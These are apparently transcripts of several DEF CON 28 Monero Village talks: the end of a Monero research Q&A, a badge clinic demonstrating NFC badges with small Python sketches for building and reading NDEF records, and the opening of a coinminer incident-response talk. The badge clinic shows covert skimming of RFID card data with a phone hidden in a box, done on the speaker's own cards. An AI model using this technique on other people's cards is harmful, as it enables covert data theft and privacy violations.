very much a one-sided, increasingly lopsided argument toward, you know, limiting the protocol. And there are still things to do in terms of that. And I think the more that we understand about some of the early protocol decisions and how that optionality was bad, the more that that can influence better decisions going forward. You know, the protocol will always have the old chain's history to deal with. And I think the best thing we can do is try to make the decisions going forward that, you know, improve uniformity, which can decrease risks and improve safety. Understood. Andreas asked the last question here. Are there any projects working on voting based on Monero? I know that one Italian government wrote up that one thing about how they were maybe considering it. Yeah, that was a political party, right? Yeah, it was. You know the one I'm thinking of? Yeah, I don't know if that ever actually got implemented. I don't think it did either.
Voting is, I mean, I'm by no means an expert on voting, but everything that I know, and I mean, folks who do the different villages at DEF CON involving voting probably know way more than I do, says that electronic voting is tricky. And if you think you've found all the ways it could go wrong, they will always surprise you. So I don't know. I mean, I thought it was cool to see in the original LSAG paper an application to voting, just kind of as a fun academic thought experiment. And who knows, you know, presumably something involving, you know, good signer-ambiguous proofs going forward might be beneficial. You know, who knows? If you need it for voting, though, you know, I don't think that LSAG or CLSAG would be the thing to use. I mean, there are enough efficiency problems that trying to scale that out, because again, the whole idea was that you basically have all the different possible voting entities as part of a ring, or the entirety of the ring, like that isn't going to scale reasonably well. And you know, the trust model is so much different for voting that, you know, you could probably get away with something that ends up trading certain kinds of trust for, yeah, I don't know, maybe it's trading that kind of trust for better efficiency. I haven't thought about this nearly enough, and people who have will speak to it better, so I'll stop rambling. Yeah, understood. Okay, well, that's the time that we have. Thank you so much, Sarang. If people want to follow the Monero Research Lab, there's always the #monero-research-lab channel. Sarang is always there, of course, 24-7, manning it. Yeah, there's definitely the IRC channel. And for folks who don't want to be on IRC, you know, posting questions in r/Monero, there are a lot of folks there who are good at research and development who can answer. On the monero-project meta repo, on the issues there, you can see when all the meetings are, and logs from those meetings are always posted as well after the fact, so folks can see what people have been talking about. Yeah, and everyone's welcome at the meetings if they happen to have anything that they think is interesting or useful research the group might like to see. Yeah, a lot of great contributors, not just me by any means, a lot of really great researchers and folks who are interested in protocol improvements and, you know, improving privacy in the digital assets space. So thanks to all the other contributors. Well, thank you so much, Sarang, for joining us again. We...
|
Ever wanted to have one of your Monero or cryptography related questions answered by the Monero Research Lab? Ask away!
|
10.5446/50651 (DOI)
|
Okay, so we're starting on time. And this is, let's see if I can do this, multiple cameras. So this is the, can you guess, in this hour? This is the badge clinic. You almost can read that. So what will we talk about in this hour? We'll talk about badges, these things here. Yeah, so we'll probably see what they can, what we can do with this year's badge because it's kind of a storage device, so we can use it for backup and some other interesting things. Because it's an office hour, there is no set agenda. So we'll probably jump around a bit from different topics. And I will watch the, keep my eyes on the general text and the office text channels in case, in case there are some questions. Okay, so I guess you can see that this year's badge looks a little different than the last year's badge. They're about the same size. This year we have no LEDs and no power supply. There's no battery inside this year. In place of that, we have a fine leather finish on the back with a plastic enclosure and a full color front overlay. And I'm just curious if audio is okay. I don't know which channel to type to. There's all these channels. Okay, so I'm not going to make any changes unless somebody tells me. So one of the things you can see in this year's badge, even though it does have a front overlay that usually covers all of the parts with color plastic, this PET. So instead of seeing this, which is a PCB, you see this, which is a cover, a front overlay, full color printed. And in order to see these very small chips, which we thought would be interesting for all of the hardware hackers among us, we put in these transparent windows. All right, so let's take a look under the microscope at these transparent windows. Because I'm curious as well what this looks like. So this is the raw PCB with a EEPROM integrated circuit on top there, soldered in. And when we take a look at the color overlay, okay, this is going to need focusing and less illumination. Yeah, you can't see too well, can you? I guess because the light needs to be just right. Let's turn the light on again. Okay, so my experiment didn't work that well, but these are the EEPROMs that are storing our data this year. All right, so take a look at the channels and it seems that video and audio is okay. So we'll do a quick demonstration on how we can write to these. Storage locations. All right, so that's the, that's with and without the front overlay. And to write to this, the antenna is on the back. So we're going to need to align the antenna from the back with a reader device, which typically is a smartphone. All right, in order to use the radio to be able to use NFC, you have to turn the phone on and it has to be at some accessible screen for the users, right? So it can't be turned off. That's the first thing you need to do in order to use the badge over radio. The next thing you have to ensure that the NFC circuit is turned on. And that's right here. I can turn it off. And you need to have that turned on. All right. So those are the two things that you need. And after that, if you have nothing else happening, aside from, aside from what do we have? We have discord and the Chrome browser running on my phone. So something should happen if I have programmed something to this device and I align the antenna of the badge device to the phone. So I'm going to push the middle button there. And it brings up a web browser. That's telling me that the data stored on this button, which I pushed, is a URL. 
And in case you're curious, this is what the URL is on all of the middle buttons. All right. So that's reading data off of the device, off of the badge. This here is an electronic badge. Without really doing anything at all. This is right out of the box. What does the box look like? Looks like this. I don't know if this is so interesting, but we'll do the unboxing. So you get a, so actually this is a wrong manual for this box, but you have this excellent manual by Andres. And in some part, I discovered this just on my own. Let's see if we can. In fact, on the printed manual, his name isn't on your, oh yes, it is. In fact, there it is. So it's not so, so it's not so anonymous. I'm glad that he put his name on there. I thought he hadn't. So that comes in the box. Obviously, the different parts for a do-it-yourself model. You have to put it yourself together. You have to do it yourself, put it together. So the parts that do come assembled are all of the very difficult things. That's these dome switches, which if you get three of them and you lose one, then you don't have enough. If you don't lose all three, you still have to align them perfectly well over the circuits and then place tape on top without anything moving more than a half millimeter. So it's just kind of messy and uncomfortable. On top of everything else, we knew that we would have to preassemble some of the parts anyway, because these E-Proms, which we have already seen under the microscope, they're only two by three millimeters wide and they're one half millimeter tall also. So they're very, very small. That's why we're preassembling at least some of the parts which come in the do-it-yourself kit. All right. So that's what comes in the box. And after you take that out, you have something like this. You put it together, put the leather on the back and the color overlay on the front. And then you can start programming and doing just the same thing that I showed before. I will do that just once more in case you didn't completely see it. This time, there's nothing on the front. This time, I'm going to show the action from the back. I'm going to align it over the antenna. I'm going to push down. Did you hear that? So that's how it sounds. And when I look at the front, well, it opened a web browser. Now I've got a whole bunch of web browsers on here. Yeah, okay. So that's the reading right out of the box. Because we did pre-program some of these identifiers onto these devices. There are three E-proms. And on each E-prom, you have a variety of different slots, depending on how much data, because they do have different capacities. These three E-proms, the first two are 512 bytes, and the last one is 8 kilobytes. So depending on how much is there, you can do quite a lot of things. In fact, let's try using this program called NFC Tools. And I'm going to add several records. I'll try to do this very fast. Let's do Monero Village. Oops. Monero Village. God, I'm not spelling too well today. All right, we've got Monero Village. I'll put another URL on there for a pop quiz later on. Monero Devices. We'll put a piece of text. We'll say this is, we'll just say DEF CON. DEF CON 28, safe mode. Do you like that? Okay, so we have some text. What else should we put on there? Somebody give me an idea. Here, take a look at all of these things. I'll help you choose. Quite a lot of different types of information, isn't it? Each one of these conforms with the NDEF standard. So that's what goes on NFC data storage. 
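For anyone who wants to reproduce the record-building half of this demo outside the NFC Tools app, here is a small sketch using the third-party Python package ndeflib (imported as ndef). The URLs and the email address are stand-ins based on the demo, not necessarily the exact values used on stage, and the resulting bytes would still need to be written to the badge with a phone or an NFC reader.

# Sketch of building NDEF records like the ones added in NFC Tools above,
# using the third-party "ndeflib" package (import name: ndef).
# This only produces the encoded NDEF message bytes; writing them to one of
# the badge EEPROMs still requires an NFC writer.
import ndef

records = [
    ndef.UriRecord("https://monerovillage.org/"),      # URI record
    ndef.UriRecord("https://monerodevices.com/"),      # second URI record
    ndef.TextRecord("DEF CON 28, safe mode"),           # plain text record
    ndef.UriRecord("mailto:hello@monerodevices.com"),   # email expressed as a mailto URI (made-up address)
]

message = b"".join(ndef.message_encoder(records))
print(len(message), "bytes of NDEF payload")

# The first record is usually what a phone acts on first, which is why
# reordering the records in the demo changes which URL the badge opens.
for record in ndef.message_decoder(message):
    print(record)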
Every single one of these record types has a MIME type, which the app is hiding from you because it's not a comfortable way to store information. It just tells you, okay, an address, and there's a MIME type associated with this. So let's just say Iceland. That's a place, isn't it? I think so. All right. So that's a place. We'll add another one. We'll add a file link. I don't know how. I've never done a file link. I don't know how that works. So let's do application. What's an easy one here? Email is really easy. We can do email. We can go at Monero devices. And object. Oh, okay. It seems that that should say subject, shouldn't it? Dumb subject. I don't know why it says object there. And here we'll just type hello world. So we're putting in an entire email, the headers and the body. Hello email, I guess. So we've got all of these different pieces of data. Do you folks see that? I mean, I could keep going, right? What's more options? So I could keep going and we would have 20, 30, 50 pieces of data here. And we can rearrange them. And what I wanted to show is that there are two URLs. So which one do you think will open a website? I mean, it's going to open a website if I write this to a village badge, so let's do that now. Let's write. It says approach NFC tag, do you see that? This is all quite self-evident, I think. So I'll turn the phone over. I'll align the badge onto the phone's antenna on the back. This time I will use the star button. Shall I do that? All right. So it's saying approach NFC tag and now I'm going to click on the star. All right. Maybe you heard that, and it does say write complete. So what will happen now? If I close this application, do I want to close this? Not really. Let's see what happens if I don't close it. So we're at the home screen, I suppose you call this. And I will, instead of clicking the second button, the moon there, I will click the star. So it does bring up a website, monerovillage.org. Oh, I think it's, I think, I didn't use encryption. I just wrote HTTP, I think. Is that what it's complaining about? No, monerovillage... hmm, what's wrong with this? I don't understand the problem. Okay, so here is the URI. Maybe it's because the WWW is not correct. The point is that the web browser opened. Certificate date is invalid. Okay, so it seems that we have some problem with our website. It doesn't matter too much. What's important is that this badge automatically opened a website that we have programmed onto this device ourselves. Right. We can try this again. Looking back at the list of pieces of data. What happens now if I rearrange this, if this URI replaces the first one, let's do that now, shall we? So I'm going to use the star again, but this is a different badge. So that on the back there. And I will click. Why isn't it working now? Could it be? Did another? So this is not working, is it? Let's try this one again. Let's try this one. So this time it worked. Not sure what happened with that other badge. And the test is to see what happens now when I use that one button, and it will bring up a website. I am. Okay. I'm going to use the correct website now that we got before. So that's kind of the workflow of programming these and using them for data storage. monerovillage.com. Is that what AJ is saying? I thought it was .org.
So I've been typing org all these days and you're saying that I have to type calm there? Then do I get a certificate? It still says it's not secure. All right, so this is not the right time to troubleshoot and debug the website. But we did, however, we did just have a demonstration of how to program and use these badges on a day-to-day basis. So I can show you our application or homepage, I suppose you could call it for this year's Village Badge. How do I do that? I have to go back to this web browser. And because we were spending most of our time on the hardware, the software interface or the website, in other words, some of the parts are working and others aren't. So this is bobmonerodevices.com. This is with a good certificate. Okay, that's German, but it says the certificate is fine. So we have two different menus here, one at the top that can toggle left to right and one that goes up to down. And we've got some actions. I mean, this is a standard web application, right? We're not trying to make a whole operating system here. But the traditional, the typical things like the about page, I guess this is good enough. It has all the information that you might expect. We have the welcome page there, which gives you an idea that you can use the badge on Android or iOS, because those two devices are smartphones with NFC circuits inside, and that NFC tools is the application that works. There's a few other things that work as well, like the game. I'll just click on game there on the left. It takes a bit to load. So we teamed up, Monero Village teamed up with the Rogues Village and a few others as well. And they programmed a game, which works with the badge. I haven't gotten that far myself, but you can see there's a few people who have made it to the end. And the one thing that I don't like, if you just left click on the play button, so there's a cross-side scripting problem, which it's not a problem. It's how the website is intended to work, but it's called Core, C-O-R-S. And what you have to do is click on the right, do a right button click, and then, I mean, you can choose any of these things. I'm just saying, if I choose this, you won't see it. It's going to a different tab. So what I'm going to do is copy the URL and then put it up here to show you what the game looks like. And this is the Rogues Adventure Game. There's a bunch of things to read about it here, but we will just kind of start playing. And although I haven't made it too far, according to our colleagues at the Rogues Village, it's about halfway through that you can use your electronic badge with this game. So I'll just type some random thing here. And so I'm not going to do this too long, but I'd like to give you some idea of how it works. So you can go down the stairs. I think there's something to look at here. Look at fossils. You get the idea, right? So this is kind of fun. Now how do I go backwards? Oh, I can indeed change the tabs. All right, so that's one of the things that is working. Some other easy to implement things are working, like the gallery. I mean, this is not very valuable, but if you're interested in what the red one looks like, there it is. These are the different colors, and you've got the DIY to do it yourself. That's why there's no plastic enclosures, and you've got the different parts that you put together yourself. This is the wonderful user manual that Andres created for us. It's really nice. And this is kind of our experiment with the packaging, which we failed at last year. 
And this year we did pretty well, but we went overboard with that. So that's the gallery. So we've got a file server where you can download the glossy color user manual, or that, well, it's not glossy. I don't know. They have to take that off. It's not printed on paper when you download it electronically, so there's no gloss or matte finish, okay? But you can get copies of either one. I'm not sure what happens if I click there, if it even works. You see it does work. So there's Andres' design and all of the illustrations, really wonderful work. So I'll go back and you can tell that the file server is working. We've got status, which is kind of halfway accurate. It just says there, its application is undergoing development, which is true. We've got a top 10 FAQ. So I explained already why the playing of the game fails when you click on it, which is, the developers are participating, so none of this is all too exciting. What we actually really want, we start at the beginning here again, what we actually really want is here at the configure. No, I'm sorry, not the configure, but at the onboard. This is where it's going to get exciting, because although it's not fully implemented to actually write the NDEF identifiers and pieces of data over radio, so we want to implement those things here and the way it will work. So you put your name here, any name at all, you could write, you could change the gender and change the geography, you could write you're one of, you're some dead person, you could write I am Alfred Nobel. So Alfred Nobel is no longer with us. What I'm just saying is that you can create a pseudo name here, all right, it's a nickname. After you put that in, you check off the things that you're interested in. So I like IOT, I like Rogues a lot. And well, that's too many maybe I want biohacking as well. I won't be able to get them all on there because I'm programming the very small eProm. So I need to take some off, you get the idea. So I'm just going to be interested in this one round Rogues, Monero and biohacking. Well click on associate me and this is where it starts to not work. So even if I click on there, it's kind of, these are not my choices. Yeah, you can see that this is still in prototype mode. So these are not my choices. But eventually we'll be able to write data or cancel. And it will start waiting for you to attach a badge or put a badge next to the antenna on the phone. If I want to do a factory reset, I can do that as well. And that's how this association and onboarding functionality will work. Once you have your identifiers on the eProms all lined up like you like, you might want red team on the third eProm. You might want biohacking on the second one and crypto privacy on Monero you'll want maybe on the first one, whatever it is. You line these up and you write them to your badge. You can then use the intervillage network. And although this looks okay, it actually does look like it works. So this says here under development, please stay tuned. So it's not working yet. In the end you can connect to the intervillage network by clicking on connect. You can do a ping just to test the network connection. If you need to authenticate, because for example some of the village rooms or channels or topics are protected, maybe they would like to know who walks in through their doors. Then you can authenticate. And if you don't need to, then you just skip that opcode or network code. You can turn on the bridge. 
I think the bridge will be activated by this command, the safe mode, which basically means we're going to do a proxy from the MQTT network, which is what we're connected to here, to the DEF CON Discord. I mean this is kind of not relevant because they're probably going to turn off the DEF CON Discord tomorrow. So there won't be much time to use it. But that's there just maybe for another day next year. So we can knock on one of the participating villages doors. We can knock on Monero's door. And if we don't get a response, we can knock again. And maybe on the third knock we're automatically allowed to enter. There can be some logic like that. Once we're inside, we can tip using AJ's tip arrow, but one, two, four units. And once we're inside, we can get information about our room. Maybe we're walking in the biohacking room for the first time. And we didn't realize that there is a device program there, medical device program. We'd like to know more about the room that we walked in. We click on info. We can leave the room just as easily with the leave command and disconnect from the network with disconnect. All right, so that's kind of the rundown of the web application, which is under development. If we look at status, it says that clearly, application under development. Okay, anybody who wants to help develop this, let me see how to... So there is a URL to show. I've written it down some other place, but I'll never be able to find it. So I'll just reuse this piece of paper. I'm going OK, AJ. So if you'd like to help to develop all of this web application logic, which is quite challenging, it's just tedious, lots of troubleshooting, firebug, and debugging. You can do a fork of the repository because it's all open source. The repository is found here. So this one is certainly calm. I know that because we don't have org. And we have a certificate. Everything's OK here. SCM stands for source code management. And if you do go there, then you can find all of our source code. Shall we take a look? Or are there questions about something else, some other topic? General text, office text, you don't see questions. So what we'll do, we'll take a look at the source code management system. How do I get back to that? Here it is. Okay. So now we will choose instead of bob. Let's go to SCM, shall we? And the nice thing about SCM is that it takes quite a long, long time to load because it's a very slow virtual server, VPS virtual private server. All right. But in any case, we see that there's something did come up here. So instead of explaining all of these things and clicking through each one, which is very slow process, I'll just go right to apparatus, which is Esperanto for devices. And then we have a list of the different types of devices. Badges is here. And in the list of badges, we should see a few different things. And there is Monero rising. Iron triangle, which is the parent project of this derivative, the Bush of Being. I think I should rename this, but the Bush of Being is the Intervallage Badge. So I just clicked on that. Let's navigate over to where the web application is found. It's under software. So there's a bit of things to read about here. The storyline, hardware, network, it's not up to date, but I think it's good enough explaining a few things. So right here in software, that's because it's obviously not hardware, graphics, and closure or documents. So if we have a web application, it's going to be listed under software. So I click there, we've got the website. 
So we may see other things here under software. We may have Android, APK, not the APK itself, but the source code that builds the APK and whatever it's called for the Apple. So I'm going to click on website, and then most people who are familiar with websites, you see the traditional CSS, the HTML5 and JavaScript CSS arrangement. So we've got documents. This is where Andres's user manuals are located inside the actual sources. And then we've got a few things. I think Fawned Awesome is in here as well, a few things like that. So here's the index. I don't think anything else is all that interesting. I'll just click on index to see what that looks like. And we're not going to drill down too deep, but this very last level is just kind of maybe interesting for some reason. This is all the source code. Oh, my, and it's just not interesting at all. Okay, so you do have some snippets, and you can navigate through this SCM source code management on your own because it is public site. You can fork, pull, and fetch sources. You can do merge requests. And I certainly hope that you do as well because we could use a help. I mean, there's few of us doing work on this. So that's why we're kind of behind on things like the web application. So AJ says it all is good. I'm happy about that. We have another 20 minutes or so. What should I do now? So yesterday what I said I would demonstrate was the impersonation is going to be a bit difficult, but I said I would demonstrate a passive capture. It's not data theft because these are my own devices. So it's like opening the drawers to your shirt drawer, you know, you're not stealing your shirts when you do that in your own house, right? So that's why I can take my own data and everything is just fine. If you do this without your own data, it's just not okay at all. So what I have here is a very nice box of chocolates. I wish the light was a bit better. I'm going to try to adjust the lights a bit. I'm not sure if that helps. I don't know if that helps. So I've got a nice box of chocolate here. And first thing what I will do is prepare this because I forgot to turn something on. Right. And that's the other camera angle. That's about the size of the box of chocolates. And that's the way a box of chocolate sounds, isn't it? I don't know if you heard that. So either remove this cover, open this up. What do you think is inside? You want to take a guess? No? You don't want to guess? I'll show you. Okay. So that's these chocolates are inside. Now, they're definitely chocolates. Okay. Okay. So I've eaten almost all of them. I'm sorry. I didn't leave any for you. So what do you think will happen? First we put this lid on the chocolate again. And let me just do that. I should have prepared this beforehand. I'm sorry about that. All right. So we've got the box of chocolates. I'm now going to place, let me just do this a different way. I'm going to place a library card on the box of chocolates. The contrast is very bad because it's a blue library card and blue chocolates. I'm sorry about that. I couldn't change the colors quickly. All right. So here's a library card and just going to drop that on there. Not sure if you heard that. If you didn't, I will put my microphone next to the box of chocolates. So I think you heard it that time. What I just did is capture data off of my library card. All right. 
So here I'm looking at the data now because if this wasn't my own data and if it was a credit card instead of your library card, or say a passport, I'm not sure what types of cards and devices have this kind of circuit inside, but this one as we can see is a MIFARE. So it's an ISO 14443. This is an RFID standard. And we just captured the data, right? The good news is that it's encrypted. You can tell that because it's got an ATQA and an SAK. But the serial number is there and you can certainly see some things, right? So what is this number ISO 14443? Let's just do one more thing. How shall I do this? I'm going to capture the data off of my Intervillage Badge now. And I will demonstrate that it's very difficult to trick your Intervillage Badge in the same manner for one reason, because it has passive data theft protection built in. So this is the screen. You can see that it's empty. I'm now going to try to capture the data in the same way and just dropping it on there. It does nothing. It's impossible to capture the data. I'm going to align the antenna. There is no problem. The device is perfectly well aligned on top of the turned on smartphone, which is capturing right now. It's reading. The reason that it does not successfully capture the data passively in this manner, which would be known as theft, is that I have not pushed on one of the three buttons. And once I do that, as long as the screen is still turned on, once I do that, we should hear it capture. So let me go back here. All right. So I think you heard that. It did capture something as I was pushing down on there. Let's see what it captured. So I got all the data off of my Intervillage Badge, that thing. And the good news about that, so it's a different ISO standard. If we want to use the ISO 14443 like the library card was, then I just need to use a different button, right? Because we have 15693 on these two. And the sun is a 14443 standard, which is MIFARE. So we can basically copy the data off of this library card onto this badge. All right? It is encrypted, which makes it more difficult, but some library cards are not encrypted. So some of the things to understand about that: it did successfully copy the data or capture it, right? If this is a box of chocolates that's unopened, you would not know that this is happening. And you can do this with a number of daily objects like magazines, newspapers, you can embed a reader into a table itself at a coffee shop. I think you understand the point. So today and tomorrow, yesterday and forever, there are people stealing data and we wouldn't know it. And that's what makes it important to have a sense of, not a sense, to have a technical circuit built in which disconnects the antenna when you're not pushing on this. When a human is not pushing on one of the three buttons, this antenna is not connected to the ICs, the integrated circuits, which are storing the data. And what that means is that it's nearly impossible. It could be possible. It might not be impossible. I just don't want to say that, but it's very difficult. It's very, very difficult to capture data off of these things unless you're pushing on a button. And what I call that is defense against passive data theft. Is that what you call it too? Needmoney, are you watching? All right. So we just demonstrated the passive data theft protection. And we demonstrated the writing of information. We demonstrated the passive capture of a library card. We demonstrated the difficulty of copying encrypted information.
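As a rough idea of what the same kind of read looks like from a laptop instead of a phone, here is a sketch using the third-party nfcpy library with a USB NFC reader. Tag type support varies by reader and library version, and, as stressed above, this should only ever be pointed at tags and cards you own.

# Sketch of reading a tag's basic identifiers with the third-party "nfcpy"
# library and a USB NFC reader (a different setup than the phone used in the demo).
import nfc

def on_connect(tag):
    print("tag:", str(tag))                 # tag class and product info as nfcpy identifies it
    print("UID:", tag.identifier.hex())     # the serial number seen in NFC Tools
    if tag.ndef is not None:
        for record in tag.ndef.records:     # NDEF records, if the tag exposes any
            print("record:", record)
    return False                            # returning False ends the connect loop

clf = nfc.ContactlessFrontend("usb")
try:
    clf.connect(rdwr={"on-connect": on_connect})
finally:
    clf.close()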
We also saw a nice chocolate box demonstration. And what else do we have? So there are a variety. What I like to experiment with are these types of transit cards. Quite often they either have a copper smart card integrated circuit or they have an antenna inside. You can't see it then. And here's one, for example, with an antenna inside. How about this? Let's do another test. I will turn on the smartphone again. So we'll get this working again. And remember, it's always very important to have your screen turned on. Otherwise, the NFC circuit, a lot of the radios, don't work. So this is an empty screen. There is no data on the screen. We're now going to passively copy data off of a transit card. Shall we do that? So I'll just drop it on there. And if you heard that, it's already too late. If I was not the owner, then I would have just lost the information. So what we have here, this is an interesting memory model. It's a MIFARE again. So you would see the 14443. Has a serial number. It has memory information. So this is quite interesting. On the Pro model, it dumps the memory; on this one, it doesn't. But in any case, so we just captured the data from a transit card. All right, so that's how that works. What else can we demonstrate? We can take a quick look at what the devices look like from start to finish during the manufacturing. So the manufacturing starts with an etched circuit board like this. Get the light a bit better. The lighting is just not very good. But so I'm not happy about that. And then there's a shadow if I do that. Okay, so this is the PCB or printed circuit board. And if you take a quick look, there are no parts on there. You can see the three different footprints, U1, U2, U3. There are no switches on the switch footprints, SW1, SW2, SW3. So that's how we start. The other side needs to be flush and straight. So we don't have parts on there at all because it needs to be right up against the reader device in some situations. So we begin by populating parts on this side. So I'm going to show a different PCB now. There they are side by side. And the one doesn't have parts. And this one does. Okay, so what does that look like? After we populate the PCB with switches, with EEPROMs, with integrated circuits, that's what it looks like then. There we go, focused. So we've got the three switches on there. We've got a piece of Kapton tape on top to keep them in place. And then we've got our EEPROMs, two of which are holding data in NDEF type 4. I'm sorry, NDEF type 5. And the last one, which is this one, U3, is holding data in the format of NDEF type 4. That's the MIFARE one. All right, now the other side is just the same because, like I said before, in some cases we need this antenna to be right up against the reading device. And for this reason, we can't put parts there. And the next step in the procedure to populate or to create these devices and assemble them is to place an overlay on the front and a piece of leather on the back for protection. All right, so what does that look like? The overlays look like this. So that's what it's like when... I'll just use one here. So that's what it looks like when we have placed the overlay, which has an adhesive back on it, peeled the adhesive backing off and put the overlays on. And you can see that through the overlay there are transparent windows that show you the parts underneath the small chips. The other side of the badge, because we're going to be... So this is hard to see because it's black, but in this case it's red.
This is where we differentiate the colors in the villages. Monero obviously has an orange one. And the reason that leather is on there is so that when you put this against the phone, it's not scratching your lens. Okay, so there is a functional purpose for this leather. Most people think that it's decorative. I mean, it does feel good. But it's actually there to protect the lens of your reading device, which is usually a smartphone. All right, so that's the front and the back. And once we do that, all we need to do to finish the device is to put it inside an enclosure frame. The reason this has two stripes is that they come out of the printer like this. It needs supports in between those two protruding pieces of the model. And that's why we put some supports in between. And one problem that we found is that every 10th badge that we assemble, we break the frame on it. So that's one reason we're not including frames with the do-it-yourself models, because it would just be too much of a... We would need to supply two, three, four frames for each badge to ensure that the person didn't break it. All right, so that frame goes on the edge of the badge, as you can imagine. And it covers part of the leather to keep that on. And the edge is no longer... Well, let me... I mean, this doesn't look good when you don't have that plastic on. You can see the different layers. So that's kind of a decorative thing. I do suppose that if you drop the badge, the plastic frame does help a bit there as well. It's called a protection feature.
This is kind of how we were developing before we got far enough to release the design. So we have some wires soldered on there and extra button up here, which is a different tactile strength here. These are 260 grams. And this one up here is only 130, I think. And different parts. These are M24SRLR04. And the back looks very similar. So this is a prototype board. Here is the Monero Rising. This is quite nice. I soldered a header on there for the SAO connection. And basically how these work, it comes with a battery. You turn it on and off on the side here. When you turn it on, it lights up, obviously, because there are a lot of LEDs on here. So let's see what that looks like on the front. Now we'll turn it on. So that flash is a negotiation. It says I've turned on. It's indicating that the badge is ready for action. So there are three capacitive touch buttons on the bottom here. They're not tactile. They're capacitive touch, which means I just lightly put my finger on the middle one to turn it on and off. So now it's on. I have to be careful when I'm using the buttons because they are very sensitive. So pressing them from the back is possible as well. Let's see if I can do that. Okay, it's not so easy as I thought, but if I push the same button again, it turns it off. Understand how that works? Once turns it on, once turns it off. So that's the on-off button. The buttons to the side, left and right, these change the animation. Some of you already know this because we produce quite a lot of these badges and a lot of people took them home last year. So I will move to the second animation. Here's the third animation, so I can go back to the first. And in all cases, when I switch the animation, I have to rest my finger on there long enough for it to complete the entire animation cycle. If I just do a quick tap, it will not read. Okay? Well, then it did, but you get the idea. Once I'm touching that button at the very end, it won't register. So that's how the animations work. You can switch, you can turn this on and off with the middle, turn it back on, turn it off, turn it on. So that's how these things work. The one that I like the most, it's the very first one. I think it's Starry Night or Sparkle. I can't remember the name, these animations have names. Yeah. I wish Midi Poet was here because he did the firmware design and engineering. Called these things what they look like, like the Starry Night. And we're close to finished with the badge clinic for today, but I hope that some of this information was helpful. Once again, I will turn it over just to show the back in case you're curious. That's how it looks. I could put this under the microscope, but anything larger than this very small part on the end under the microscope, it's, it doesn't, you can't tell, it doesn't help because the microscope is too powerful. So this is what this badge looks like. It has, I think a hundred, between 120 and 140 parts. I've forgotten the actual number. You turn it on and off with a switch on the right here. Be careful with the switch. You don't want to push down while you're, it's good to be careful with it. It has, it has bent off in some situations and you have to bend it back. So I'll just turn it off there. And that's the hardware on off switch. All right. So we're five minutes until the next presentation, which I believe is, let's just check that out unless AJ wants me to stop or I don't know if we have a next presenter. Let's just check this out. Monero village.what. Org.com. I really, I don't know. 
I'm going to do org. Okay. So this is not TLS protected, but in this, this moment, I'm not so concerned. Now let's see who's doing the next presentation. We have badge clinic is what's happening right now. And so in one half hour, we're going to hear from Ruben. Giving competition to Monero by ditching opt in privacy. All right. So this looks very interesting. This appeals to me quite a lot. It's always nice to know what other cryptocurrencies are doing and how that relates and contrasts with our technology here at the Monero village. And we actively welcome all of the cryptocurrencies in the world, including the one you just made five minutes ago with your Python module, Python library. So this is what we do in Monero village, right? Anything is blockchain related cryptocurrency, things like that. You're welcome to ask questions about it or just come by and explain your project. We have that with Loki mesh as well today. Really interesting stuff. And in the next presentation, which is coming in just one half hour, it will be from a Z coin enthusiast and developer, I believe. So that sounds, that looks really good. So I'm going to say goodbye. And I hope that you liked all of these devices. These badges there, I think are sold out for the, for the do it yourself models because people seem to like those quite a lot, but I do have this stack right here, plus a few others of the preassembled model. So if you're interested in attack red, a defense blue, you can get that, I'll write the URL here as well, just in case you're not sure where to find them. With that, then we will turn off the stream. So the URL is shop dot Monero devices.com. That's where you can still available. Get your badge. Does that sound good need money? Are you watching now? Are you watching Scott? Who's watching besides myself? All right, so that's, that's all for today. This was the badge clinic, the last badge clinic of the year 2020. Well, you know, we could, could be in China for, I'm not sure about that they canceled China, but that was the badge clinic for DC 28. And thanks a lot to the AV folks for helping AJS. You did a great job and, and just as well. Okay, so I will say goodbye. And that's it for me. My name is Michael. I'm MSVB. Have a good one and thanks for listening.
|
With the help of a close range circuit camera, Michael illustrates the circuits of several recent conference hardware devices, including prototype models. Devices in circulation and on display include: DC28 Intervillage Badge, DC27 Rising Badge, 35C3 Blockchain, DC26/BCOS Badge, HCPP19 Badge, HCPP18 Badge. This is not a speech presentation, rather it is an easy office hours with show and tell to invite questions and answers about low power electronic devices. Visit the Badge Clinic on any day of Defcon in the Monero Village channel (Discord:Defcon/mv-general-text).
|
10.5446/51590 (DOI)
|
Hello and welcome to my presentation with the title Hunting for Blue Mockingbird CoinMiners. I am Ladislav Bačo and I would like to spend the next 20 or 25 minutes talking about incident response and investigation of the recent incidents attributed to the relatively new threat actor called Blue Mockingbird. But because we are in the Recon Village, this talk will not be about incident response only; instead, I would like to share with you our experiences, how we used reconnaissance and open-source intelligence approaches to enrich our results from standard forensic malware analysis. As often happens, the attackers have deleted some of their tools after they used them. However, with our recon and OSINT approach, we were able to find them and reconstruct the original attack performed by the attackers. Moreover, we were able to track the origin of the malware and we got insight into the technical capabilities of the Blue Mockingbird threat actor. And finally, in some cases, we could track the incoming cryptocurrency payments used by Blue Mockingbird, and we can estimate the profit of the attackers and compare it with the damage caused to the victims. So this is our agenda and now allow me to introduce myself. Who am I? I am Ladislav Bačo and I currently work as a senior security consultant and malware analyst for LIFARS, a New York City based incident response and digital forensics company. In the past, I also worked for the government of one European country as an analyst in a CSIRT, a computer security incident response team. But now, okay, we can ask an obvious question. Why a presentation about malware analysis, threat intelligence and OSINT? There are a lot of automated solutions such as antivirus scanners and sandboxes. So why do we need to bother with additional malware analysis and enrichment with info from other public sources if those automated solutions can identify most of the common threats? Well, the reason is in the previous sentence. They can identify most of the common threats, and I would like to emphasize the word common. When you need to deal with advanced threat actors or uncommon threats such as rare or obfuscated malware samples, they can stay undetected by many antivirus scanners and sandboxes. On the other hand, a malware analyst can perform a brief analysis of those samples and moreover, if they enrich the gathered results with intelligence info, they can quickly provide the rest of the team with an accurate report. And this report can include not only the purpose and capabilities of the malware, but also the origin of the samples or attribution to the threat actors. It can also help to reveal as yet undiscovered steps of the attacker, as well as recover the still missing pieces of the malware puzzle used by the attacker. And last but not least, this brief analysis with intelligence data can collect more indicators of compromise, the really relevant ones, for threat intelligence and for the threat hunting and monitoring team. And when we are talking about using threat intelligence and other data sources, we can search for many attributes. There are obvious ones like URLs, hashes and so on, but in addition, very helpful can be a search by filename, regular expressions and malware classifications such as categories and tags. Also, a search for strings embedded in the malware or a search by import hashes can discover more similar samples which can be linked to the same attacks or to the same threat actors. And where to search?
